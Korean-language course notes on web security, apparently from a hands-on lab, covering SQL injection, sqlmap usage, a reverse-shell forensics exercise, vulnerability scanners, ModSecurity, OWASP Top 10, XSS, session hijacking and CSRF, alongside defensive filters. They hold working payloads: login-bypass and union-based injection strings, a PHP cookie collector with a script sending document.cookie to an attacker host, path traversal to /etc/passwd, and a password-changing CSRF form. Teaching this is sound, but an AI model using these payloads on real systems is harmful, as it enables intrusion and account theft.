  • 제로데이 공격(Zero Day Attack): 소프트웨어의 아직 알려지지 않은 취약점, 심지어 제조사도 아직 알지 못하는 취약점을 공격, 아직 해당 보안 취약점에 대한 패치가 이루어지지 않은 상태에서 해커에게 거의 무방비로 당하는 형태의 공격
  • DDoS: 해커가 디바이스의 제어권을 얻은 뒤 봇넷으로 이용, 특정 서버에 끝없이 액세스를 해서 서버 과부하 유발 - 트로이 목마(Trojan) 악성코드로 인해서 DDoS 감염이 될 수 있음
  • 랜섬웨어(Ransomware): 멀웨어의 한 종류로, 피해자의 파일 등을 암호화 한 다음 금전을 요구. 랜섬 웨어에 감염이 되면 ‘암호화를 해제하고 싶다면 비트코인으로 결제를 하라’ 등의 메시지가 뜸.
  • 브라우저 익스플로잇(Browser Exploit): 브라우저의 보안 취약점을 이용해서 틈타는 공격. ActiveX 등의 스크립트를 통해서 사용자가 다운로드 받게 만들고, 브라우저를 마음대로 조종
  • SQL Injection: 주로 웹에서 일어나는 익스플로잇 공격으로, 데이터베이스의 헛점을 이용하여 예상치 못한 값을 입력. 임의의 SQL 쿼리를 실행하여 데이터베이스를 조작
  • 키 로깅(Key logging): 사용자가 키보드로 입력하는 정보를 감시, 훔쳐가는 공격 수법. 키보드에 입력된 정보는 운영체제에서 처리가 되는데, 그 때 정보를 빼내서 파일로 저장한 다음 해킹 서버로 보냄. - 아이디, 비밀번호 등의 기밀 정보가 유출되기 쉬움

SQL Injection

• sql 구문을 중간에 끼워 넣음
• 종류

1. Non-Blind SQL Injection : 결과 확인 가능
   • Query result SQL: 쿼리 결과 SQL
   • Error Base SQL: 오류 발생 유도를 이용한 SQL
2. Blind SQL Injection : 결과 확인 불가능, 유추 해야 함 → 주로 자동화 공격
   • Boolean SQL: 참과 거짓을 통해 데이터 확인
   • time base SQL: 시간 차 공격(sleep).. 활용해서 참일 경우 딜레이

Non-Blind SQL Injection

• 예제 1

  • 로그인 ID, PW에 'or' 1=1 으로 하면 가능

    select id,pw from class where id='$id' and pw='$pw'; select id,pw from class where id=' 'or' 1=1' and pw=' 'or' 1=1';

    • 1은 참이기에 or를 통해 참거짓만 판단하여 맨 처음에 나오는 계정으로 로그인이 되어버림

• 보안 방법

  1. ' 를 막음
  2. db에 보통 로그인이 되지않거나 되어도 상관없는 계정값을 맨처음에 넣어놓음

• https://velog.io/@dpwls_w/웹-사이트-해킹-모의실습-2-DB

• %27 : ' %20 : 공백

• Mssql 데이터베이스

  • INFORMATION_SCHEMA.TABLES

    INFORMATION_SCHEMA.COLUMNS

    SYS.OBJECTS

    SYS.COLUMNS

• Oracle 데이터베이스

  • ALL_TABLES USER_TABLES ( TABS ) ALL_TAB_COLUMNS USER_TAB_COLUMNS ( COLS )

• Mysql 데이터베이스

  • INFORMATION_SCHEMA.TABLES

    INFORMATION_SCHEMA.COLUMNS

Blind SQL Injection

1. 참 거짓으로 구별 ( boolean-base blind SQL)

   • select substring ( 글자,위치,길이)

     select substring('sevas sivas',1); 첫번째 글자부터 select substring('sevas sivas',2,3); 두번째 글자부터 3글자

     • 아스키코드로 크기 비교

       • 아스키코드 주의할 점 숫자는 0x30 에서부터 시작 문자는 0x41 대문자

                0x61  소문자

         • 아스키코드로 찾기 (0x41 = A =65 0, x61= a = 97) [문자] select substring((select id from class limit 0,1),1,1); [10진수] select ascii(substring((select id from class limit 0,1),1,1)); [16진수] select hex(ascii(substring((select id from class limit 0,1),1,1)));

           • a d m i n

             [첫번째문자] = a select hex(ascii(substring((select id from class limit 0,1),1,1))) = '65'; select hex(ascii(substring((select id from class limit 0,1),1,1))) = '61';

             [다섯번째문자] select hex(ascii(substring((select id from class limit 0,1),5,1))) <= '6d'; 0 select hex(ascii(substring((select id from class limit 0,1),5,1))) <= '6e'; 1 select unhex('69');

         • 반대로 16진수를 문자로 바꿀때 : unhex

         • 로그인 실습

           웹페이지에 넣어본다 (로그인창) (database = sevas ) [16진수] ' or hex(ascii(substring(database(),1,1))) =73#

           [10진수] ' or ascii(substring(database(),1,1))=115#

           #은 주석 (--)

2. Time-base Blind injection

   • 참/거짓 응답 확인이 어려울 때 확인하는 기법
   • 직접 들어가지 않더라도 확인할 수 있음.
     • select 1 and sleep(3); 3초 지연 select 0 and sleep(3); 지연X
     • select hex(substring(database(),1,1))= 73 and sleep(5); 지연 select hex(substring(database(),1,1))= 74 and sleep(5); 지연X select unhex('73');
     • ' or hex(substring(database(),1,1))= 73 and sleep(5)# ID: ' or hex(substring(database(),1,1))= 73 and sleep(5)# 지연 PW: 아무거나 ID:' or hex(substring(database(),1,1))= 74 and sleep(5)# 지연X PW: 아무거나

• sqlmap tool

  • [-u URL] : 공격을 수행할 페이지 주소 지정 ****
  • [--cookie=COOKIE] : 쿠키 값 지정
  • [--data DATA] : POST 방식으로 데이터가 전달될 때, 해당 데이터를 지정
  • [-p TESTPARAMETER] : 공격을 수행할 파라미터를 지정 ****
  • [-v VERBOSE] : 명령어 수행을 얼마나 상세하게 출력할 것 인지를 지정 (0~6)
  • [--passwords] : 사용자들의 패스워드 해시값을 출력
  • [--tables] : 데이터베이스의 테이블들을 출력 *****
  • [--columns] : 데이터베이스 테이블의 컬럼들을 출력 *****
  • [--dump] : 데이터베이스 테이블 엔트리를 덤프 *****
  • [--dbs] : 데이터베이스 리스트 출력 *****
  • [-D DB] : 특정 데이터베이스 지정 *****
  • [-T TBL] : 특정 테이블 지정 *****
  • [-C COL] : 특정 컬럼 지정 *****

• tool 예시

  • db 정보 수집 sqlmap -u "http://192.168.10.100/board_view.php?b_no=0" -p "b_no"

  • db 확인 sqlmap -u "http://192.168.10.100/board_view.php?b_no=0" -p "b_no" -dbs

  • table 확인 sqlmap -u "http://192.168.10.100/board_view.php?b_no=0" -p "b_no" -D sevas --tables

  • column 확인 sqlmap -u "http://192.168.10.100/board_view.php?b_no=0" -p "b_no" -D sevas -T class --column

  • 값 확인 sqlmap -u "http://192.168.10.100/board_view.php?b_no=0" -p "b_no" -D sevas -T class --dump

    위치: /root/.local/share/sqlmap/output/192.168.10.10

    

SQL Injection 방어

1. 특수문자들은 공백으로 만들어서 사용하지 못하도록 코드수정

   1. ' , " , \ , null 등을 자동 백슬레시로 이스케이프 하는등 문자열 필터링 (' " ) 앞에 \를 하여 일반 문자로 바꿔줌

      • php 코드 보안

        board_view.php

          $b_no=$_GET['b_no']; 아래
          if(preg_match('/(union|select|from|where)/i', $b_no))
          {
          echo "No SQL-Injection!!!!<br>";
          exit;
          }
        
          proc/login_proc.php
        
          $id=$_POST['id'];
          $pw=$_POST['pw'];   아래
        
          $id = preg_replace("/[\r\n\s\t\'\;\"\=\-\-\#\/*]+/","", $id);
          $pw = preg_replace("/[\r\n\s\t\'\;\"\=\-\-\#\/*]+/","", $pw);
          if(preg_match('/(union|select|from|where)/i', $id))
          {
          echo "No SQL-Injection!!!!<br>";
          exit;
          }

2. union,select 와 같은 SQL 구문을 검사하는 코드를 제작하여 검색 시에 에러 페이지를 출력 시키도록 한다.

• upload보안

  1. php나 asp나 html등 web확장자 파일 차단.
  2. 특수 문자나 웹스크립트 언어 부분을 치환하거나 막는다. ( 백신,디펜더 )

• download보안

  1. 기존의 DB내용에 있는 파일인지 점검
  2. ../../../ 와 같은 경로문자를 빈칸으로 치환

참고 사이트

https://nordvpn.com/ko/blog/exploit/

웹페이지 소스코드를 모두 공개할 것이며, 추가적인 위협을 가하겠다는 내용을 받았다. 침해된 시스템에 남겨진 흔적과 각종 로그 파일을 분석하여 다음 사항을 밝혀내시오.

A. 공격자가 웹페이지 소스코드를 유출한 시간(UTC+09:00)은?(yyyy-MM-dd_hh:mm:ss) B. 리버스쉘(Reverse Shell)을 동작시키는 프로세스 ID(PID)는? (10진수) C. 리버스쉘(Reverse Shell)에 대한 공격자 주소(IP)는?

과정

• 웹페이지 -> 웹과 관련된 사용 -> 업/다운 주의기울이기
• passwd 시스템 계정이 아닌 일반 계정 추려내기 (admin01/dev/ahnlab)

• lastlog 로그인 기록 확인, 연결 터미널 확인 - 외부 연결 : dev, ahnlab

• netstat 192.168.184.162 IP가 접속한 기록 ->22(SSH), 80(HTTP)

• ps_eaf ppid와 pid 잘 살피기 /upload/editor/image/reverse.php가 업로드 된 것을 확인

• access_log /upload/editor/image/ 로 검색하여 업로드된 내역들 확인(GET명령어) 공격자 112.216.97.29 PID 5244 sh -c php -f /var/www/upload/editor/image/reverse.php

• base64 디코더(https://www.base64decode.org/)

• 112.216.97.29 dGFyIC1jdmYgL3Zhci93d3cvdXBsb2FkL2VkaXRvci9pbWFnZS8xMzMwNjY0ODM4IC92YXIvd3d3Lw

        tar -cvf /var/www/upload/editor/image/1330664838 /var/www/

• 112.216.97.29 bHMgLWFsICAvdmFyL3d3dy91cGxvYWQvZWRpdG9yL2ltYWdlLw

        ls -al  /var/www/upload/editor/image/

• 112.216.97.27 - - [25/Aug/2012:17:18:32 +0900] "GET /upload/editor/image/cmd.php HTTP/1.1" 294 311 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;

• 112.216.97.29 - - [25/Aug/2012:17:18:51 +0900] "GET /upload/editor/image/cmd.php?cmd=cHdk HTTP/1.1" 200 323 "Mozilla/4.0 (compatible;

결론

PC IP: 192.168.184.162 소스코드: reverse.php 유출 시간: [25/Aug/2012:17:26:26:40 +0900] 공격자: 112.216.97.29 PID: 5244 /upload/editor/image/reverse.php

nikto

nikto -h 192.168.10.10 -C all -o sevas.html -F html

-C 검사범위 -o 파일이름 -F 파일포멧 -h 호스트

openvas

openvas 설치 (웹취약점 스캐닝)

apt-get dist-upgrade -y apt-get update apt-get install openvas -y

gvm-setup gvm-check-setup gvm-feed-update gvmd --user=admin --new-password=asd123 gvm-start gvm-stop

nessus

칼리에서 진행

https://www.tenable.com/downloads/nessus?loginAttempted=truehttps://www.tenable.com/products/nessus/nessus-essentials

메일주소 넣고 get start 버튼 클릭 → 메일에서 activation code 를 받고 메모장에 저장

download Nessus

nessus [view download] 선택

Nessus-10.7.3-debian10_amd64.deb 다운로드 Debian 9, 10 / Kali Linux 1, 2017.3, 2018, 2019, 2020 AMD64

download by curl -> 코드 복사 후 칼리에 붙여넣기

칼리 일경우에는 Nessus- amd64.deb centos 일경우 .rpm 으로 설치

cd /root/다운로드 ls -l Nessus-8.15.1-debian6_amd64.deb

dpkg -i Nessus-8.15.1-debian6_amd64.deb

service nessusd restart

netstat -lntup |grep nessusd

https://127.0.0.1:8834

Register nessus essentials 선택후 continue => skip => 받은 ativation code 입력

설치가 다되면 target 192.168.10.0/24 설정

WAF (Web application firewall )

• 패키지 설치 yum install mod_security*

• 패키지 파일 확인 rpm -ql mod_security rpm -ql mod_security_crs

• 패키지 구성

  • Mod_security : 모듈시큐리티 Mod_security_crs : 기본 owasp 룰셋 (무료용)

• 설정 - 웹 시그니처 변경

  • vi /etc/httpd/conf.d/mod_security.conf

      SecServerSignature "Microsoft-IIs/5.0"
      SecRuleEngine On   <==== waf 룰 적용 / off 로 하면 ip로 접속 가능
    
      # SecResponseBodyAccess Off
      SecResponseBodyAccess On   <<< respons 접근
    
    

→ 페이지 접근 시도 시 Forbbiden이 뜸

- 기본적으로 도메인이 아닌 IP로 접근 되는것을 전부 막아버림
실습을 위해서 이부분만 주석처리
- UTF-8 설정을 위한 인코딩 룰셋 제거 (임시방편)
    - SecRuleRemoveByid 960024 →  추가 후 데몬 재실행

• 보호 기록 확인: vi /var/log/httpd/modsec_audit.log / error_log → 공격 내역
  • 프로그램에서 나오는 로그 = audit

• CVE (Common Vulnerabilities and Exposures)

  • 알려져 있는 보안 취약점 - 년도 별로 일련번호 리스트화

• CWE(Common Weakness Enumeration)

  • 알려져 있는 소프트웨어 보안 약점 표준화 정보

• CCE(Common Configuration Enumeration)

  • 알려져 있는 시스템 설정 취약점 리스트

• OWASP(The Open Web Application Security Project)

  • 오픈소스 웹 애플리케이션 보안 프로젝트로서 웹에 대한 위험성을 10대 웹 애플리케이션의 취약점 (OWASP TOP 10)으로 하여 3~4년마다 국제적으로 발표

2021

• A01 : Broken Access Control (접근 권한 취약점) - 접근 권한 미설정

            - 루트킷이나 백도어, 관리자 권한이나 자동 실행과 같은 취약점이 노출되면서 이를 공격자가 이용, 악의적인 행위를 함
            - 대책 :  사용자가 권한을 벗어나 행동할 수 없도록 정책을 시행 (추가되는 관리자 권한 확인 ,권한 제한 )

• A02 : Cryptographic Failures (암호화 오류) - 평문 데이터 노출

            - Sensitive Data Exposure(민감 데이터 노출)의 명칭이 2021년 Cryptographic Failures(암호화 오류)로 변경
            적절한 암호화가 이루어지지 않으면 민감 데이터가 노출
            - 대책 : 암호화 , 문서 보안

• A03: Injection (인젝션)

            - sql injection → sql 쿼리문이 url 이나 인자 값에 전달이 되면서 정보를 획득
            - 대책 : sql 문의 UNION, JOIN , SELECT 등 악의적인 행위를 할수 있는 코드를 replace해서 공백으로 바꾸는 등 시큐어 코딩 진행 , 시그니처 필터

• A04: Insecure Design (안전하지 않은 설계)

            - 웹 방화벽 부재 , 가용성 부족, 자원 집중, https가 아닌 http 운영 등 누락되거나 비효율적인  제어 설계로 표현되는 다양한 취약점
            - 대안 : 웹 방화벽 설치 , 라운드 로빈과 같은 부하 분산 이중화 , 자원의 분산화 , https 암호화 통신

• A05: Security Misconfiguration (보안 설정 오류)

            - 불필요한 기능이 활성화 혹은 설치, 기본 계정 및 암호화가 변경되지 않았을 때, 지나치게 상세한 오류 메세지를 노출할 때, 최신 보안 기능이 비활성화 혹은 안전하지 않게 구성되었을 때 발생
            - 대안 : directoryindex 보안 설정 , 서버 시그니처 제한 , 웹페이지 출력 제한 , (DNAT) 포트 변환

• A06: Vulnerable and Outdated Components (취약하고 오래된 요소)

            - 취약하고 오래된 요소는 지원이 종료되었거나 오래된 버전을 사용할 때 발생 → 애플리케이션 뿐만 아니라, DBMS, API 및 모든 구성요소들 포함
            - 대안: 프로그램 최신화 , 업데이트

• A07: Identification and Authentication Failures (식별 및 인증 오류)

            - Broken Authentication(취약한 인증)으로 알려졌던 해당 취약점은 identification failures(식별 실패)까지 포함하여 더 넓은 범위를 포함할 수 있도록 변경
            사용자의 신원 확인, 인증 및 세션관리가 적절히 되지 않을 때 취약점 발생
            - 대안 : 세션 파기 , 재사용 금지 , 자동 세션 종료 , 비밀번호 확인 절차 추가 (비밀번호 확인 , OTP , recaptcha  등등)

• A08: Software and Data Integrity Failures(소프트웨어 및 데이터 무결성 오류)

            - 2021년 새로 등장한 카테고리 - 무결성을 확인하지 않고 소프트웨어 업데이트, 중요 데이터 및 CI/CD 파이프 라인과 관련된 가정을 하는데 중점
            - 대안 : 무결성 점검 프로세스 구현 , 직원 보안 교육 (체크섬 확인)  , 검증되지 않은 프로그램 다운로드X

• A09: Security Logging and Monitoring Failures (보안 로깅 및 모니터링 실패)

            - Insufficient Logging & Monitoring(불충분한 로깅 및 모니터링) ⇒ Security Logging and Monitoring Failures (보안 로깅 및 모니터링 실패) 변경
            로깅 및 모니터링 없이는 공격 활동을 인지할 수 없음 → 이 카테고리는 진행 중인 공격을 감지 및 대응하는데 도움이 됨
            - 대안 : IDS , IPS ,UTM 등 보안 장비 구현 및 실시간 감시

• A10: Server-Side Request Forgery (서버 측 요청 위조)

            - 2021년 새로 등장한 카테고리 -  SSRF 결함은 웹 애플리케이션이 사용자가 제공한 URL의 유효성을 검사하지 않고 원격 리소스를 가져올 때마다 발생
            공격자는 방화벽, VPN 또는 다른 유형의 네트워크 ACL(액세스 제어 목록)에 의해 보호되는 경우에도 응용 프로그램이 조작된 요청을 예기치 않은 대상으로 보내도록 강제할 수 있음
            Server-side Request Forgery  서버쪽에서 위조된 호출을 유도하는 공격
            xss , csrf 공격과 유사하게 외부 호스트를 호출하는 대신 로컬호스트를 호출하여 내부적인 공격을 함
            사용자의 입력값으로 URL을 받아서 처리하는 서비스의 경우 이를 이용해서 출력시킴
                - file://etc/passwd, http://127.0.0.1/file  등과 같이 로컬에 있는 서버 자원을 사용해서 의도된 공격 행위를 함
                - 대안 : 127.0.0.1 이나 localhost같은 로컬호스트 요청 부분 필터링, 인증된 url 및 호스트만 사용 가능 (제한) , DNAT을 통한 망분리

1. 네트워크 보안 → 네트워크 자원 획득

   • sniffing, spoofing, dos → 패킷

2. 시스템 보안 → 시스템 자원 획득

   • rootkit, race condition, pwcracking( 시스템 계정, 권한)
   • /etc/passwd, /shin/usr/bin

3. 어플리케이션 보안 (web보안) → 보안 웹정보 획득

   • 웹 정보, session hijacking, xss( 스크립트 ,링크) , injection, up/download

     보안: UTM

1. nmap 네트워크 대역으로 찾기 nmap -nP 192.168.10.0/24 셋 다 같은 MAC 주소를 가지고 있음 = 하나의 장비

2. 사이트 접속 - 게시판에 글 작성

3. url에 union을 삽입하여 컬럼 수 찾아내기 http://192.168.10.60/board_view.php?b_no=0' union select 1,1,1,1,1--+ 글 내용이 내가 입력한 내용으로 변경된다면 성공 (컬럼 수: 5개)

4. information_schema database를 이용하여 어떤 database가 있는지 찾아내기 http://192.168.10.60/board_view.php?b_no=0' union select 1,1,table_schema,table_name,1 from information_schema.tables group by table_schema limit 0,1--+

   • group by를 해야 테이블들이 하나로 뭉쳐져 DB를 찾기 편리해짐
   • limit 뒤의 숫자를 하나씩 바꿔보며 찾기( 1,1/ 2,1...)
   • 텅 빈 값이 나온다면 더이상 데이터가 없는 것 bacubacu, hackmap, sevas, webhack을 찾아냄

5. table 이름 찾기 - where 부분에 DB 이름 넣기 http://192.168.10.60/board_view.php?b_no='union select 1,1,1,table_name,1 from information_schema.tables where table_schema='bacubacu' limit 0,1--+ class, b_tb를 찾아냄

6. column 이름 찾기 http://192.168.10.60/board_view.php?b_no='union select column_name,1,1,1,1 from information_schema.COLUMNS where TABLE_SCHEMA='sevas' and TABLE_NAME='class' limit 0,1--+; c_no, id, pw, nick, date 를 찾아냄

7. column 값 찾기 http://192.168.10.60/board_view.php?b_no=0' union select id,pw,nick,version(),1 from class limit 0,1--+ 다른 테이블 컬럼 찾기 (from 에서 DB.class) http://192.168.10.60/board_view.php?b_no=0' union select id,pw,nick,version(),1 from webhack.class limit 0,1--+

• 각각 찾은 데이터들..
  • bacubacu gorani/ gogosing nuguri/ sjrnflek web_admin / sevas*12ya~ yungsuya /saranghe bapjo / qkqwntpdy master /g7
  • hackmap test / asd123 hack /ilikehack sevas / sevasgood websecure / secure123 webadmin / congratulationszer02 gozilra / gogosing

8. 찾은 id와 pw로 로그인 하기

• 혹은 ' or 1=1 and c_no='5' # 로도 가능(관리자의 c_no가 5)

• ‘크사’라 부름

• 자바 스크립트를 써서 공격자가 의도한대로 사용자를 유도하는 공격

  <script> location.href="[https://www.naver.com](https://www.naver.com/)"</script>

  • 간략한 링크들

    1. 클릭 시 웹페이지 이동 <a href = "http://www.naver.com"> click here </a>

    2. 이미지 클릭 시 웹페이지 이동 <a href ="http://www.naver.com"><img src="주소" width="100" height="100"></img></a>

    3. 사이트 링크 넣기 <iframe src="https://www.nate.com" width="800" height="800" frameborder="10"></iframe>

    4. 응용 유튜브 올리기 <iframe width="560" height="315" src="영상링크";>

    5. xxs 공격 (바로실행되도록 하기) [ Stored XSS (Persistent XSS, 저장 XSS)]

• 기능 확인 <script> alert("안녕하세요")</script>

• 무조건 외우기 <script> alert("안녕하세요")</script>
<script> location.href="[https://www.naver.com](https://www.naver.com/)"</script> <script> alert(document.cookie)</script>

종류

• Stored XSS (Persistent XSS, 저장 XSS)

    - 웹 서버에 악성 스크립트를 영속적으로 저장해 놓는 방법
    - 클라이언트는 저장된 스크립트를 통해서 공격자의 의도대로 실행됨

• Reflected XSS (반사 XSS)

    - 지정된 파라미터를 사용할 때 발생하는 취약점을 이용하는 공격
    - 매개체를 통해서 공격 되는 XSS 공격

• DOM-based XSS (문서 객체 모델-기반 XSS) → SSRF

    - 문서 내에 있는 태그나 링크들을 클릭하여 전달되는 XSS

  • ssrf https://www.lgcns.com/blog/cns-tech/security/3202/

  • 취약한 서버를 이용하여 공격자가 내부 서버에 원하는 요청을 보내도록 하는 방법

  • 보통 공격자가 과도한 정보나 기능을 요청할 경우, 방화벽에서 필터링하거나 웹 서버에서 원하는 정보를 보내주지 않습니다. 하지만 인터넷 앞단의 웹서버가 입력된 URL 값을 충분하게 검사하지 않고 내부 서버로 전달한다면 이야기가 달라집니다. 이것을 이용해서 내부 서버의 정보를 노출시키거나 서비스 거부 공격할 수 있는 것입니다. 이처럼 SSRF는 웹페이지 번역 서비스, PDF 문서 생성기의 잘못된 구현이나, 퍼블릭 클라우드 환경에서 메타서버 접근통제가 미흡한 경우 발생할 수 있습니다.

  • SSRF는 ‘CSRF(Cross Site Request Forgery)’와 비슷한 이름을 가지고 있습니다. 이 두 공격은 비슷한 방식을 사용하지만 이용하는 매개체가 다릅니다. 원하는 정보를 얻을 때 SSRF가 서버의 요청을 이용한다면, CSRF는 사용자의 요청을 이용하는 것이죠. 두 공격 모두 공격자가 접근할 수 없는 정보나 시스템에 접근할 수 있도록 만들어줍니다. 하지만 공통적으로 내부에서는 ‘정상 요청’이라고 인식하게 됩니다.

  • 해당 링크 주소를 변경하여 내부의 자원을 서버가 직접 출력하도록 만듬, 자원을 끌어옴

  • 로컬 호스트를 사용할 수도 있음(직접 들어가서 가져오는 것도 가능) http://192.168.10.10/down_file.php?file_name=../../../../../../../etc/passwd

• Universal XSS

    - 브라우저 안에서 실행하는 XSS - 주로 URL 이용(input, form, GET)

실습

• 실습 순서
  1. 로그인한 페이지의 쿠키값 메모장 저장
  2. 프록시의 오픈 브라우저로 로그인하지 않은 상태에서 프록시 설정
  3. 쿠키값을 저장한 값으로 교체
  4. 페이지가 열릴때마다 메모장에 저장된 쿠키로 바꿔줌
  5. 회원정보수정으로 가서 비밀번호 1로 변경해봄

쿠키와 세션의 차이

• 쿠키 = 사물함 KEY

    - 맨 처음엔 서버가 클라이언트에 제공하는 값, 이후엔 클라이언트에 저장되는 값이자 서버에서 클라이언트를 식별하는 값 (식별 값)
    - 쿠키를 받았을 때 해당하는 세션 정보를 서버는 제공
    - 즉 쿠키는 클라이언트에 저장 서버 접속 시 서버는 쿠키를 확인 후에 해당 클라이언트 이전 접속 정보를 전송

  • 세션 = 사물함
    • 요청자와 서버 간의 연결
    • 세션 정보를 가지고 있음
  • 세션 : 실제 사용자의 연결된 정보 쿠키 : 세션을 받기 위한 클라이언트 인식값
  • 세션: 서버나 서비스에 별도로 저장되는 연결값 또는 연결정보 쿠키: 서버가 저장하고는 있는 세션정보를 넘겨주기 위한 인식값
  • 쿠키는 텍스트 형식으로 클라이언트 하드에 저장됨 서버의 정보를 받기위한 인식값 세션은 서버에 서비스나 기타 주제에 따라 별도로 저장되는 연결값 또는 연결정보

    세션 탈취 방지 위한 방법 (세션 만료, 재사용 불가)

1. 중요한 단계나 사이트 갱신 시 쿠키를 재갱신하여 이전 쿠키를 세션 정보를 사용할 수 없도록 함 (JWT 토큰 인증)
2. 쿠키에 대한 세션 유효시간 설정 (JWT 토큰 인증)
3. 중복 로그인 방지(약한 보안, 내가 안쓸때 들어올 수 있음)
4. 로그아웃과 같은 수단 활용 쿠키를 사용 후 세션만료를 할 수 있도록하여 세션 재사용 불가

    결론 : 쿠키 재사용X

세션 하이재킹 (session hijacking) → 운용 중인 세션을 가로챔

1. 공격 측에서 만든 코드

    - vi /var/www/html/getcookie.php
   
        <?php
        $fd=fopen("/sevas/cookie.dat","a+") or die ("can't open file");
        fputs($fd,$_SERVER['REMOTE_ADDR']."Cookie is {$_GET["cookie"]} \n" );
        fclose($fd);
        ?>

2. 웹서버에서 공격 (게시글 작성) <img name="i" width="0" height="0"> </img> <script> i.src="http://192.168.10.20/getcookie.php?cookie="+document.cookie</script>

3. 칼리의 /sevas/cookie.dat 에서 세션 쿠키를 확인하고 확인된 쿠키로 로그인 시도

    `<img name="i" width="0" height="0" src="http://192.168.10.200/getcookie.php?cookie=PHPSESSID=si3i13dbbucosb3oprqmd1f9f1">`

   • 이외의 공격 코드
     • http://192.168.10.10/board_view.php?b_no='><img src=x onerror=prompt(5)>
     • http://192.168.10.10/board_view.php?b_no=%27)><script>alert(%27sevas%27)</script>
     • http://192.168.10.10/board_view.php?b_no=%27><script>alert(document.cookie)</script>
       • %27 = '

• 쿠키 토큰 세션 - JWT

  • 쿠키: 클라(cookie 요청 내용 추가) => 서버(set-cookie 저장소 세션 호출을 저장 )

    세션: 서버에 저장 (식별 값에 의한 연결 값 저장), 계정 정보 연결

    토큰: 토큰 안에 유저 정보가 저장 ( 사용자 정보 암호화 ) , 쿠키/세션 방식을 보안하기 위해서 나옴

  • header payload와 verify signature의 암호화 방식 , type등 정보가 저장 payload ID/PW와 같은 사용자 정보 verify signature : base64 인코딩한 header,payload,secret key를 더하여 서명

1. 로그인
2. ID및 PW 계정 정보를 payload에 입력
3. 토큰 유효기간 설정 (JWT) json web token - refresh token
4. 암호화할 secret key 를 사용해 access token 발급
5. 사용자는 access token 을 저장하고 인증때마다 헤더에 실어서 보냄 → refresh_token을 통해 새로운 access_token 갱신
6. 서버는 해당 토큰의 서명값을 secret key로 복호화 하여 조작 여부 유효 기간 판단
7. 검증이 완료 되면 payload 디코딩하여 사용자 정보를 가져옴

    - 장점 : 간편 확장성 뛰어남 , 쿠키의 단점인 재사용을 보완
    - 단점 : payload 자체에는 base64 디코딩이 가능함 , 길이가 길어져서 인증이 많아질수록 서버의 자원 낭비 심해짐

• xss 대응 방안 http://blog.plura.io/xss-대응방안/

CSRF

• 사용자 의지와 무관하게 공격자가 의도한 행위를 특정 웹사이트에 요청(서버의 자원을 사용)

  xss와 CSRF의 차이

• xss → 쿠키나 정보 탈취, 자바스크립트 사용

  • csrf → 사용자의 비정상 행위 발생, 서버에서 제공하는 기능 사용 , 서버에서 자원 동작

     
                            xss                                 CSRF
    공격수행          클라이언트                         서버
    기능구현          공격자 script                         서버 제공 기능
    script사용여부              필수                             선택
    공격시 준비              취약점 발견시 즉시 사용                     동작 원리/request/response의 로직 분석
    공격감지 가능              감지 가능                      구분이 어려움
    
    

이벤트 당첨 확인바랍니다<br>
<form method=POST action=proc/update_proc.php>
<input type=hidden name=pw value=1>
<input type=submit value="휴가갈사람">
</form>

보안 대책

1. '<' 와 같은 웹스크립트 사용 불가 → GET 사용 x
2. 기존의 내용과 비교할 수 있는 검증 수단 마련 or OTP 와 같은 2차 인증
   • 2019년 이후 자바 스크립트자체에서 file:/// 로 이동하는 내용 막힘

• script 방어

  • 글자 방어
    • $subject=preg_replace("/